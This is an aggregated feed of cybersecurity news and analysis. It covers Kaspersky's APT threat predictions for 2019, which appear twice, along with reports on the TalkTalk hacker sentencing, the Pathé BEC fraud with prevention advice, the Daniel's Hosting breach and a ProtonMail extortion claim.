Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them– something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IOT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)



Securelist

Kaspersky Security Bulletin: Threat Predictions for 2019

There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.

Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.

No more big APTs

What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?

The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.

Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them– something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.

Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IOT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)

SecurityWeek RSS Feed: TalkTalk Hackers Sentenced to Prison

Two individuals were sentenced to prison on Monday for their roles in the 2015 hacking of British telecoms company TalkTalk.

Connor Allsopp, 21, and Matthew Hanley, 23, both from Tamworth, Staffordshire, pleaded guilty to hacking-related charges last year. Allsopp has been sentenced to 8 months in jail and Hanley to 12 months.

read more



SecurityWeek RSS Feed

Third parties: Fast-growing risk to an organization’s sensitive data

The Ponemon Institute surveyed more than 1,000 CISOs and other security and risk professionals across the US and UK to understand the challenges companies face in protecting sensitive and confidential information shared with third-party vendors and partners. According to the findings, 59 percent of companies said they have experienced a data breach caused by one of their vendors or third parties. In the U.S., that percentage is even higher at 61 percent — up 5 … More

The post Third parties: Fast-growing risk to an organization’s sensitive data appeared first on Help Net Security.

Business email compromise scam costs Pathé $21.5 million

Recently released court documents show that European-based cinema chain Pathé lost a small fortune to a business email compromise (BEC) scam in March 2018. How much? An astonishing US$21.5 million (roughly 19 million euros). The attack, which ran for about a month, cost the company 10 percent of its total earnings.

What is business email compromise?

Business email compromise is a type of phishing attack, sprinkled with a dash of targeted social engineering. A scammer pretends to be an organisation’s CEO, then starts bombarding the CFO with urgent requests for a money transfer. The requests are generally for wire transfers (hard to trace), and are often routed through Hong Kong (lots of wire transfers, even harder to trace).

Scammers will sometimes buy domain names to make the fake emails look even more convincing. These attacks rely on the social importance of the CEO: nobody wants to question the boss. If an organisation has no safeguards in place against these attacks, a scammer will likely be very rich indeed. It only takes one successful scam to generate a huge haul, at which point the scammer simply vanishes into the ether.

What happened here?

This particular BEC scam is of interest because it highlights a slightly different approach to the attack. Scammers abandoned pitting the fake CEO against the real CFO in favour of faking French head office missives to the Dutch management.

It all begins with the following mail:

“We are currently carrying out a financial transaction for the acquisition of foreign corporation based in Dubai. The transaction must remain strictly confidential. No one else has to be made aware of it in order to give us an advantage over our competitors.”

Even though the CFO and CEO thought it strange, they pressed on regardless and sent over 800,000 in Euros. More requests followed, including some while the CFO was on vacation—both executives were fired after the head office noticed. Although they weren’t involved in the fraud, Pathé said they could—and should—have noticed the “red flags.” They didn’t, and there was no safety net in place, so the business email compromise attempt was devastatingly successful.

The shame game

Many instances of BEC fraud go unreported because nobody wants to voluntarily admit they fell victim. As a result, the first you tend to hear about it is in court proceedings. It’s hard to guess how much is really lost to BEC fraud, but the FBI have previously floated a $2.1 billion-dollar figure. The actual figure could easily be higher.

How can businesses combat this?

  1. Check the social media accounts and other online portals of your executives, and have those connected to finance make their profiles as private—and secure—as possible. You can certainly reduce a CFO’s online footprint, even if you can’t remove it completely.
  2. Authentication is key. The CFO and CEO, or whoever is responsible for wire authorisation, should have a special process in place for approvals. It shouldn’t be email based, as that’s how people end up in BEC scam trouble in the first place. If you have a unique, secure method of communication, then use it. If you can lock down approvals with additional security like two-factor authentication, then do so. Some organisations make use of bespoke, offline authenticator apps on personal devices. The solution is out there!
  3. If you have many offices, and different branches move money around independently, the same rules apply: find a consistent method of authentication that can be used across multiple locations. This would have almost certainly saved Pathé from losing $21.5 million.
  4. When there’s no other way to lock things down, it’s time to break out the telephone and rely on verbal authentication. While this may cause a small amount of business drag (If you’re on the other side of the world, is your CFO fielding calls at 2:00am?), it’s better than losing everything.

A threat worth tackling

Business email compromise continues to grow in popularity among scammers, and it’s up to all of us to combat it. If your organisation doesn’t take BEC seriously, you could easily be on the receiving end of an eye-watering phone call from your bank manager. Keeping your finances in the black is a priority, and BECs are one of the most insidious threats around, whether you distribute movies, IT services, or anything else for that matter. Don’t let malicious individuals decide when to call things a wrap.

The post Business email compromise scam costs Pathé $21.5 million appeared first on Malwarebytes Labs.

In a post-EMV world, fraud is shifting from in-person to ecommerce channels

Three years after the switch to new chip-based credit and debit cards, a study by the National Retail Federation and Forrester says payment card fraud is still a top concern for large U.S. retailers as criminals move their activities online. “The implementation of EMV chip cards and chip card readers was supposed to dramatically reduce credit and debit card fraud,” the State of Retail Payments report said. “So why is fraud still the top concern … More

The post In a post-EMV world, fraud is shifting from in-person to ecommerce channels appeared first on Help Net Security.

6,500+ sites deleted after Dark Web hosting provider Daniel’s Hosting hack

On Thursday, November 15, hackers compromised Daniel’s Hosting, one of the largest Dark Web hosting provider, and deleted 6,500+ sites.

On Thursday, November 15, hackers compromised Daniel’s Hosting, one of the largest Dark Web hosting provider. The news was confirmed by Daniel Winzen, the software developer behind the hosting service.

Daniel’s Hosting became the largest Dark Web hosting provider earlier 2017 when Anonymous members breached and took down Freedom Hosting II.

More than 6500 Dark Web services hosted on the platform were completely deleted and the bad news is that it is not possible to recover them because there are no backups as per design choice of the operator.

Daniel's Hosting

Winzen explained that hackers breached into Daniel’s Hosting database and deleted all data. The attackers exploited a PHP zero-day exploit leaked just a day before the hack and that was already fixed in db626a54a4f5, but likely attackers used other flaws.

“On November 15th around 10-11 PM UTC the hosting server got hacked. As per my analysis it seems someone got access to the database and deleted all accounts.” Winzen wrote on the DH website today.

“Noteworthy, also the account “root” has been deleted. To this day around 6500 Hidden Services were hosted on the server. There is no way to recover from this breach, all data is gone. I might re-enable the service once the vulnerability has been found, but right now I first need to find it.” 

Winzen his assessing the platform searching for vulnerabilities that attackers might have exploited to compromise the server.

“As of now I haven’t been able to do a full analysis of the log files and need to further analyze them, but based on my findings so far I believe that the hacker has only been able to gain administrative database rights. There is no indication of having had full system access and some accounts and files that were not part of the hosting setup were left untouched,” Winzen told ZDNet.

“I might re-enable the service once the vulnerability has been found, but right now I first need to find it.”

The source code of Daniel’s Hosting platform has been available as open-source on GitHub, a circumstance that might have helped the attackers in review the code and find zero-day flaws to exploit.

Who is the culprit?

It is very hard to attribute the attack to specific threat actors, cybercrime syndicates, nation-state hackers, intelligence, and law enforcement agencies are all possible suspects with valid motivations.

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post 6,500+ sites deleted after Dark Web hosting provider Daniel’s Hosting hack appeared first on Security Affairs.

Security Affairs newsletter Round 189 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      CVE-2018-15961: Adobe ColdFusion Flaw exploited in attacks in the wild
·      Linux Cryptocurrency miner leverages rootkit to avoid detection
·      A critical flaw in GDPR compliance plugin for WordPress exploited in the wild
·      Elon Musk BITCOIN Twitter scam, a simple and profitable fraud for crooks
·      France seeks Global Talks on Cyberspace security and a code of good conduct
·      Hacking the hackers – IOT botnet author adds his own backdoor on top of a ZTE router backdoor
·      Reading the Android Ecosystem Security Transparency Report
·      Cathay Pacific waited six months before disclosing the security breach
·      Expert found a way to bypass Windows UAC by mocking trusted Directory
·      Google Services down due to BGP leak, traffic hijacked through Russia, China, and Nigeria
·      Microsofts Patch Tuesday updates for November 2018 fix actively exploited Windows flaw
·      Operation Shaheen – Pakistan Air Force members targeted by nation-state attackers
·      Adobe Patch Tuesday updates for November 2018 fix known Acrobat flaw
·      Boffins discovered seven new Meltdown and Spectre attacks
·      Cyber espionage group used CVE-2018-8589 Windows Zero-Day in Middle East Attacks
·      Facebook flaw could have exposed private info of users and their friends
·      The ‘MartyMcFly investigation: Italian naval industry under attack
·      Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs
·      Congress passes bill that create new Cybersecurity and Infrastructure Security Agency at DHS
·      Kaspersky Lab opens first Transparency Center in Zurich
·      Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000
·      Senior German officials wants exclude Chinese firms from building 5G infrastructure
·      Cybaze ZLab- Yoroi team spotted a new variant of the APT28 Lojax rootkit
·      Group-IB presented latest cybercrime and nation-state hacking trends in Asia
·      tRat is a new modular RAT used by the threat actor TA505
·      Two hacker groups attacked Russian banks posing as the Central Bank of Russia
·      Using Microsoft Powerpoint as Malware Dropper
·      Japanese governments cybersecurity strategy chief has never used a computer
·      New set of Pakistani banks card dumps goes on sale on the dark web
·      Protonmail hacked …. a very strange scam attempt

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 189 – News of the week appeared first on Security Affairs.

SecurityWeek RSS Feed: Suspected Russian Hackers Impersonate State Department Aide

WASHINGTON (AP) — U.S. cybersecurity experts say hackers impersonating a State Department official have targeted U.S. government agencies, businesses and think tanks in an attack that bears similarity to past campaigns linked to Russia.

The "spear phishing" attempts began on Wednesday, sending e-mail messages purported to come from a department public affairs official.

read more



SecurityWeek RSS Feed

Protonmail hacked …. a very strange scam attempt

A hacker going online by the moniker AmFearLiathMor is claiming to have hacked the most popular end-to-end encrypted email service ProtonMail.

At the time it is not clear if the hacker belongs to a cyber crime gang, it claims to have stolen a “significant” amounts of data from the company.

The ransom demand (archive.is link) was posted on Pastebin, the hacker claims to have compromised user’s email and also accused ProtonMail of sending user’s decrypted data to American servers.

AmFearLiathMor also wrote that ProtonMail hasn’t configured the mandatory Subresource Integrity (SRI) allowing tampering and data collection.

“We hacked Protonmail and have a significant amount of their data from the past few months.  We are offering it back to Protonmail for a small fee, if they decline then we will publish or sell user data to the world.” wrote the hacker.

